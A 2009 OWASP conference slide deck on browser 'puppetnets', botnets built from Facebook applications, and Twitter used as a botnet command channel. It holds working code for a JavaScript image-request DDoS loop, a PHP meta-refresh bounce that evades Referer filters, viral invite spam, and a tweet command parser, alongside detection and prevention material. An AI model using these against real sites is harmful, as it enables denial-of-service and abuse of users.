Facebook, Twitter and Botnets OWASP Turkey Chapter September 26 2009 Istanbul
Botnet
• Collection of software robots, or bots, that run autonomously and automatically
• A botnet in its simplest form is an army of compromised computers that take orders from a botherder
• Botnets are arguably the biggest threat the Internet community has faced
• Most popular botnet type: IRC-channel-based botnets
• Lately: botnets based on social networking sites
Puppetnet
• Puppetnets rely on websites that coerce web browsers to participate in malicious activities
• Such activities include
  • distributed denial-of-service
  • worm propagation
  • reconnaissance probing
• Puppetnets exploit the high degree of flexibility granted to the mechanisms comprising the web architecture
• A website under the control of an attacker can thereby transform a collection of web browsers into a distributed system that is effectively controlled by the attacker
• Puppetnets can instruct any web browser to engage in malicious activities
Puppetnet
• Participation in puppetnets is dynamic
• Users join and participate unknowingly while surfing the net
• Easy to maintain a reasonable population, without the burden of having to look for new victims
• Harder for the defenders to track and filter out attacks, as puppets are likely to be relatively short-lived
• Puppetnets only indirectly misuse browsers to attack third parties: the browser is never compromised, it is only pointed at the target, so there is nothing on the puppet's machine to clean up
• http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pdf
Puppetnet Diagram (labels translated from Turkish): malicious web server; HTTP requests and responses that also carry the attack commands; attack traffic; victim site; web clients
What can be done via Puppetnets
• Image references
• Loading image objects through JavaScript
• Opening pop-up windows
• Creating frames to load remote objects
* No browser imposes restrictions on the location or type of the target referenced through these mechanisms
Puppetnet DDoS
• What is more important?
  • Size of the puppetnet?
  • Sufficient firepower for a typical DDoS scenario?
• Determine how much traffic a browser can typically generate under the attacker's command
  • Number of users concurrently viewing the malicious page in their web browser
  • Amount of bandwidth each of these users can generate towards the target server
• Firepower of the DDoS attack = (number of users concurrently viewing the malicious page) × (bandwidth each of them can generate towards the target server)
Facebook
• Facebook is a global social networking website that is operated and privately owned by Facebook, Inc.
• Users can
  • add friends
  • send them messages
  • update their personal profiles to notify friends about themselves
  • join networks organized by city, workplace, school, and region
Application Development in Facebook
• Options while creating Facebook applications
  • Option 1: Port an existing application to Facebook by using an iframe
  • Option 2: Develop an application by using FBML, FBJS, FQL and the FB API
• Create an application in Facebook
  • Facebook API
  • Facebook Markup Language (FBML)
  • Facebook Query Language (FQL)
  • Facebook JavaScript (FBJS)
Facebook Application (How does it work?)
• Callback metaphor to interact with applications
• A callback URL is associated with each application registered in Facebook
• When the Facebook application URL is requested, Facebook redirects the request to the developer's server
• The application processes the request and communicates with Facebook using the Facebook Application Programming Interface (API) or Facebook Query Language (FQL)
• It returns Facebook Markup Language (FBML) to Facebook for presentation
Facebook Dynamics
• Facebook API
  • Web services programming interface for accessing core services
    • profile
    • friends
    • group
    • event
    • photo
  • Performs other Facebook-centric functionality
    • log in
    • redirect
    • update view
• Facebook Markup Language (FBML)
  • HTML-like language
  • Displays pages inside the Facebook canvas
Facebook Dynamics
• Facebook Query Language (FQL)
  • SQL-based interface into Facebook data
  • Similar to standard SQL
  • Accesses many Facebook database tables
    • user
    • friend
    • group
    • group_member
    • event
    • event_member
    • photo
    • album
    • photo_tag
  • Restrictions
    • SELECT statements must be performed one table at a time
    • Join queries are not permitted
    • Queries must be indexable (the WHERE clause has to constrain an indexed column)
Facebook Dynamics
• Facebook JavaScript (FBJS)
  • Allows limited scripting functionality
  • Alternative DOM implementation
  • Similar to standard JavaScript
  • Differs from standard JavaScript
    • Where JavaScript exposes a property (such as document.href), FBJS uses a pair of get and set methods instead (getHref, setHref)
    • While processing scripting code inside script elements, it tacks the application ID onto function and variable names
    • Prevents the ability to run any JavaScript code you want
  • FBJS is transformed on the fly into JavaScript as the page is loaded
  • All variables and functions are prepended with a string like "xyz3455679_"
  • Restrictions on what can be done with DOM elements
  • Intended to prevent cross-site-scripting attacks and hostile application behaviour; as the following slides show, it still lets an application direct every viewer's browser at an arbitrary third-party host
Facebook Platform
• Standards-based programming framework
• Enables developers to create applications that interact and integrate with core Facebook services
• Facebook applications are not installed directly onto the Facebook server; instead, they are placed on the developer's server
• Facebook applications are called by Facebook when the application URL is requested
Facebook Application Diagram (How does it work?)
1. The Facebook server receives a URL request for the application (apps.facebook.com/application)
2. Facebook calls the callback URL on the server hosting the application
3. The application evaluates the request, obtains Facebook data from Facebook via the API or FQL, and sends the result back to Facebook as FBML for the user to see
4. Facebook receives the FBML response, renders it inside the Facebook Canvas and sends the resulting HTML to the browser that initiated the request
What kind of a Facebook Application?
• A simple application?
• A popular application?
• Game or utility?
• Fan-based program?
• Continuous usage?
• A program that creates programs?
• TOS?
Facebook - TOS
• http://www.facebook.com/terms.php
• Privacy
• Sharing Your Content and Information
• Safety
• Registration and Account Security
• Protecting Other People's Rights
• Mobile
• Payments
• Special Provisions Applicable to Share Links
• Special Provisions Applicable to Developers/Operators of Applications and Websites
• About Advertisements on Facebook
• Special Provisions Applicable to Advertisers
• Special Provisions Applicable to Pages
Facebook - TOS - Safety
• Safety
  • You will not upload viruses or other malicious code.
  • You will not collect users' content or information, or otherwise access Facebook, using automated means (such as harvesting bots, robots, spiders, or scrapers) without our permission.
  • You will not use Facebook to do anything unlawful, misleading, malicious, or discriminatory.
  • You will not do anything that could disable, overburden, or impair the proper working of Facebook, such as a denial of service attack.
Facebook - TOS - Provisions Applicable to Developers
• Special Provisions Applicable to Developers/Operators of Applications and Websites
  • You will only request data you need to operate your application.
  • You will not use, display, or share a user's data in a manner inconsistent with the user's privacy settings.
  • You will delete all data you received from Facebook if we disable your application or ask you to do so.
Botnet Creation in Facebook
• Image reference
  • Inline linking
  • Use of a linked object (usually an image) from one site inside a web page belonging to a second site
  • The second site is said to have an inline link to the site where the object is located
• When a web site is visited
  • The browser first downloads the textual content in the form of an HTML document
  • The downloaded HTML document may call for other HTML files to be processed
  • It also permits absolute URLs that refer to images hosted on other servers (<img src="http://www.example.com/picture.jpg" />)
  • When a browser downloads an HTML page containing such an image, the browser will contact the remote server to request the image content
Botnet Creation in Facebook
• Image reference
• A single line in the application's PHP callback such as
  echo "<fb:iframe frameborder=\"0\" width=\"0\" height=\"0\" src=\"http://www.w3schools.com/js/venus.jpg\" />";
  turns every view of the application page into one request to the host named in src (w3schools.com in the slide's example); multiplied by the number of concurrent viewers, that is the building block of the DDoS
• An iframe that downloads an image with width and height set to 0 px
• The browser fetches the iframe content but does not show it
• Change the width and height and the picture becomes visible
Botnet Creation in Facebook
• How to create a large number of requests to the target site?
  • Embed a sequence of image references in the malicious web page, either as a sequence of IMG SRC tags
  • or as a JavaScript loop that instructs the browser to load objects from the target server
• Loading image objects through JavaScript (the slide's PoC; the changing query string makes every request a cache miss, so each one reaches the target):

<script>
  var pic = new Image(10, 10);
  function DDOS() {
    var now = new Date();
    // unique query string: defeats browser and proxy caches
    pic.src = 'http://www.w3schools.com/js?' + now.getTime();
    setTimeout(DDOS, 10);   // reschedule every 10 ms
  }
</script>
<iframe name="parent" width="0%" src="page.htm" onload="DDOS()"></iframe>
Propagation of Facebook Botnet
• Create an application
• Make it nice and fun! (Really important)
• Advertise it by using Facebook features:
  • News Feed
  • Invitation (limit 20 a day), sent from the application's PHP callback; the example is the "Kim Silmiş" ("Who deleted me") application, and the Turkish action text reads "Would you like to see who removed you from their friend list, with the Kim Silmiş program?":

$invite_text = htmlentities($invite_text);
echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST' invite='true'>";
echo "<fb:multi-friend-selector showborder='true' max='20' actiontext='Kim Silmiş programı ile sizi arkadaş listesinden silenleri görmek ister misiniz?' exclude_ids='$exclude_list'>";
echo "</fb:request-form>";

  • Notification; the Turkish text reads "... is using Kim Silmiş. You too can pass the time enjoyably using Kim Silmiş.":

$facebook->api_client->notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de <a href="http://apps.facebook.com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz.');
Detection of Facebook Botnet
• The victim host must filter out all incoming traffic introduced by Facebook users
  • Use the Referer field of the HTTP requests
  • Determine whether a request originates from facebook.com or not
  • Drop the attack traffic accordingly
• A Facebook application developer can get around this: point the image reference at an attacker-controlled page that bounces the browser to the victim with a meta refresh, so the Referer the victim sees (if the browser sends one at all after the refresh) is the attacker's page, not facebook.com

src=http://attack-host/dummy-page?ref=victim-host/image1.jpg

<?php
// dummy-page on attack-host: send the browser on to whatever ?ref= names
if (isset($_GET["ref"])) {
    $ref = $_GET["ref"];
    print("<meta http-equiv='refresh' content='0; url=$ref'>");
}
?>
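The following is an added example, not code from the slides: it runs the Referer filter described above over a small constructed access log, shows that the meta-refresh bounce (and browsers that simply omit the Referer) slips past it, and then applies two checks that do not depend on the attacker-controlled Referer at all, the cache-busting query string the JavaScript loop produces and the same client fetching the same object several times in one second. "attack-host", "victim-host", the 10.0.0.x addresses and the threshold are placeholders.

```javascript
// Added example (not from the slides): Referer-based filtering of puppetnet
// image requests on the victim host, and why the meta-refresh bounce from the
// previous slide defeats it. Every log line below is constructed; "attack-host",
// "victim-host" and the 10.0.0.x addresses are placeholders.

const SAMPLE_LOG = [
  // Direct fb:iframe / <img> reference: the browser sends the Facebook page as Referer.
  '10.0.0.5 - - [26/Sep/2009:10:00:01 +0300] "GET /js/venus.jpg HTTP/1.1" 200 1532 "http://apps.facebook.com/kimsilmis/" "Mozilla/5.0"',
  // Bounced through the attacker's meta-refresh page: Referer is now attack-host, or empty.
  '10.0.0.6 - - [26/Sep/2009:10:00:01 +0300] "GET /js?1253952001010 HTTP/1.1" 200 1532 "http://attack-host/dummy-page?ref=victim-host/js" "Mozilla/5.0"',
  '10.0.0.6 - - [26/Sep/2009:10:00:01 +0300] "GET /js?1253952001020 HTTP/1.1" 200 1532 "" "Mozilla/5.0"',
  // An ordinary visitor.
  '10.0.0.7 - - [26/Sep/2009:10:00:02 +0300] "GET /index.html HTTP/1.1" 200 8810 "http://www.google.com/search?q=venus" "Mozilla/5.0"',
  // One puppet hammering the same object three times within one second, no Referer.
  '10.0.0.8 - - [26/Sep/2009:10:00:02 +0300] "GET /js/venus.jpg HTTP/1.1" 200 1532 "" "Mozilla/5.0"',
  '10.0.0.8 - - [26/Sep/2009:10:00:02 +0300] "GET /js/venus.jpg HTTP/1.1" 200 1532 "" "Mozilla/5.0"',
  '10.0.0.8 - - [26/Sep/2009:10:00:02 +0300] "GET /js/venus.jpg HTTP/1.1" 200 1532 "" "Mozilla/5.0"',
];

// Apache/nginx "combined" format: ip ident user [time] "method url proto" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;
// The slide's filter: anything served from facebook.com or one of its subdomains.
const FACEBOOK_REFERER = /^https?:\/\/([a-z0-9-]+\.)*facebook\.com(\/|$)/i;
// The JS loop appends '?' + Date.getTime(): a 13-digit query string on a static object.
const CACHE_BUSTER = /\?\d{10,}$/;
// Same client, same object, same second: an image loop, not a person (placeholder value).
const RATE_THRESHOLD = 3;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return {
    ip: m[1], time: m[2], method: m[3], url: m[4],
    resource: m[4].split('?')[0],
    status: Number(m[5]), referer: m[7], userAgent: m[8],
  };
}

// The defence from the slide: drop requests whose Referer points at Facebook.
function refererFilter(req) {
  return FACEBOOK_REFERER.test(req.referer) ? 'block' : 'pass';
}

// Run the Referer filter, then the two Referer-independent heuristics on what got through.
function analyzeLog(lines) {
  const reqs = lines.map(parseLogLine).filter(Boolean);
  const perSecond = new Map();
  for (const r of reqs) {
    const key = `${r.ip} ${r.resource} ${r.time}`;
    perSecond.set(key, (perSecond.get(key) || 0) + 1);
  }
  const result = { blockedByReferer: 0, passedReferer: 0, flaggedBySecondary: 0, clean: 0 };
  for (const r of reqs) {
    if (refererFilter(r) === 'block') { result.blockedByReferer += 1; continue; }
    result.passedReferer += 1;
    const hammering = perSecond.get(`${r.ip} ${r.resource} ${r.time}`) >= RATE_THRESHOLD;
    if (CACHE_BUSTER.test(r.url) || hammering) result.flaggedBySecondary += 1;
    else result.clean += 1;
  }
  return result;
}

console.log(analyzeLog(SAMPLE_LOG));
```

On this sample only the direct fb:iframe request is caught by the Referer rule; the five bounced or Referer-less puppet requests pass it and are picked up only by the query-string and per-second-rate checks, while the one genuine visitor stays clean. The Referer is an attacker-influenced header, so it belongs in a scoring rule beside behavioural signals, not alone.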
Prevention of Facebook Botnet
• Social network providers should be careful with the use of client-side technologies such as JavaScript
• The social network operator should provide developers with a strict API that gives access only to resources belonging to the system
• Applications should run in an isolated environment that imposes constraints preventing the application from interacting with other Internet hosts
• The Facebook Platform could drop or restrict the fb:iframe tag, since that tag is what the example uses to load images hosted at the victim host
Facebook PoC: Facebot
• www.ics.forth.gr/dcs/Activities/papers/facebot.isc08.pdf
Twitter
• Free social networking and micro-blogging service
• Enables users to send and read messages known as tweets
• Tweets are text-based posts of up to 140 characters, displayed on the author's profile page and delivered to the author's followers
• Senders can restrict delivery to those in their circle of friends or allow open access
Twitter
• Profile (name, location, bio)
• Find People (Twitter, other networks, e-mail, suggested users)
• @ (mentions and replies)
• RT (retweet)
• Direct Message
• # (hashtags)
• http://search.twitter.com
• Favorites
• RSS
Twitter Botnet?
• Reasons
  • Ability to hide random commands in the large amount of data that is generated each day
  • A really good API that makes integration easy
• Ideas
  • Option 1: A protected Twitter account that only the bots can read
    • Restricts who can see the commands
    • Easy for Twitter to block the user
    • A PoC supposedly exists
  • Option 2: Send commands to random accounts and have the bot use the search feature to find them
    • Harder for Twitter to block the messages, as the commands could be posted from any account to any other account
    • The bot would have to have a way to spot the commands in the general mess of other tweets out there
    • If the bot can spot the commands, then Twitter could do the same matching and automatically drop those tweets
    • Use seemingly innocent commands, such as "check out this link ...", instead of saying "download a file"
    • Innocent-looking commands would be hard for Twitter to block without upsetting legitimate users
• Additional suggestions
  • Using TinyURL to obfuscate commands
  • Using hash tags to represent certain things
  • Making bots follow certain accounts to mark themselves as bots
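The following is an added example, not code from the slides and not the format kreiosC2 uses: it shows the Option 2 idea above in working form, a bot picking commands out of an ordinary-looking search result using a marker hashtag, an innocent "action" hashtag per command and a TinyURL as the obfuscated argument, and then the defender's side, where the identical matcher lists the accounts issuing commands. The accounts, tweets, hashtags, URLs and the tag-to-command mapping are all constructed for the example.

```javascript
// Added example (not from the slides, and not the real kreiosC2 format): how a
// bot could pick Option 2 commands out of a Twitter search result, and why the
// same matcher works for Twitter's abuse team. Accounts, tweets, hashtags and
// URLs are constructed; the tag-to-command mapping is hypothetical.

const SAMPLE_TWEETS = [
  { user: 'alice_k', text: 'check out this link http://tinyurl.com/abc123 #tgif #coffee' },
  { user: 'bob99',   text: 'great weekend everyone #sunny' },
  { user: 'c_smith', text: 'hey @dave check out this link http://tinyurl.com/def456 #tgif #rain' },
  { user: 'eve',     text: 'check out this link http://tinyurl.com/zzz999 #tgif' },
  { user: 'frank',   text: 'loving the #coffee this morning' },
];

// What the botherder and the bots agree on in advance: a marker tag that says
// "this is for you", one innocent-looking action tag per command, and a
// TinyURL that hides where the payload or result goes.
const C2_PROFILE = {
  marker: '#tgif',
  actions: { '#coffee': 'download', '#rain': 'sleep', '#sunny': 'report' },
  argument: /https?:\/\/tinyurl\.com\/\S+/i,
};

function hashtags(text) {
  return (text.match(/#\w+/g) || []).map((t) => t.toLowerCase());
}

// Returns { command, argument } when the tweet is a command, otherwise null.
// Both the marker and exactly one known action tag must be present, so
// ordinary tweets that happen to use #coffee or #tgif alone are ignored.
function parseTweet(text, profile) {
  const tags = hashtags(text);
  if (!tags.includes(profile.marker)) return null;
  const actions = tags.filter((t) => t in profile.actions);
  if (actions.length !== 1) return null;
  const url = text.match(profile.argument);
  return { command: profile.actions[actions[0]], argument: url ? url[0] : null };
}

// Bot side: turn a search result into a command queue.
function extractCommands(tweets, profile) {
  return tweets
    .map((t) => ({ user: t.user, parsed: parseTweet(t.text, profile) }))
    .filter((t) => t.parsed !== null)
    .map((t) => ({ user: t.user, ...t.parsed }));
}

// Defender side: the identical matcher lists the accounts issuing commands.
// This is the slide's point: a pattern a bot can detect, Twitter can detect too.
function flagSuspectAccounts(tweets, profile) {
  return [...new Set(extractCommands(tweets, profile).map((c) => c.user))];
}

console.log(extractCommands(SAMPLE_TWEETS, C2_PROFILE));
console.log(flagSuspectAccounts(SAMPLE_TWEETS, C2_PROFILE));
```

Two of the five constructed tweets parse as commands (download and sleep); the tweets with only the marker or only an action tag are ignored, which is what keeps legitimate users of those hashtags out of the bot's queue. Once the operator knows the profile, flagSuspectAccounts returns exactly the accounts the bots would obey, which is why the slide's only remaining lever is wording innocuous enough that blocking it would also hit legitimate traffic.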
Twitter - PoC
• Proof-of-concept bot that uses Twitter as its command and control channel: http://www.digininja.org/projects/kreiosc2.php
• Waiting for the Defcon 2009 video, presented by Kevin Johnson and Tom Eston
Thank you
Ibrahim Halil Saruhan
Facebook: halilsaru@gmail.com
E-mail: ibrahimsaruhan@gmail.com
Questions?